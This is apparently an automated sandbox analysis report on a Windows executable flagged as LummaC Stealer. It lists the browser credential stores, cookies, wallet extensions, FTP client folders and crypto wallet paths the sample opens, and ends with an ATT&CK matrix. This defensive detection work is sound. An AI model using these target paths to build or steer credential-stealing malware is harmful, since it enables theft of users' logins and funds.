                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: fer4JIJGeL.exe PID: 7656, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: fer4JIJGeL.exe, 00000000.00000002.1621761356.0000000001812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: fer4JIJGeL.exeString found in binary or memory: ui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onho
                Source: fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: fer4JIJGeL.exe, 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: fer4JIJGeL.exeString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1510871342.0000000001835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1538148540.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1537765553.0000000001835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: fer4JIJGeL.exe PID: 7656, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: fer4JIJGeL.exe PID: 7656, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
